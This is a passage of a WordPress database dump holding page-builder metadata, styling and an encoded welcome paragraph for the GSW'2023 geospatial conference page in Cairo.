3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6130,2384,'_elementor_page_assets','a:0:{}'),
(6131,2384,'_elementor_css','a:6:{s:4:\"time\";i:1665147298;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:10:\"the7-icons\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(6132,2385,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6133,2385,'_wp_page_template','default'),
(6134,2385,'_elementor_edit_mode','builder'),
(6135,2385,'_elementor_template_type','wp-page'),
(6136,2385,'_elementor_version','3.7.8'),
(6137,2385,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6138,2385,'_elementor_page_assets','a:0:{}'),
(6139,2385,'_elementor_css','a:6:{s:4:\"time\";i:1665147298;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:10:\"the7-icons\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(6141,2386,'_elementor_edit_mode','builder'),
(6142,2386,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6143,2386,'_wp_page_template','default'),
(6144,2386,'_elementor_template_type','wp-page'),
(6145,2386,'_elementor_version','3.7.8'),
(6146,2386,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd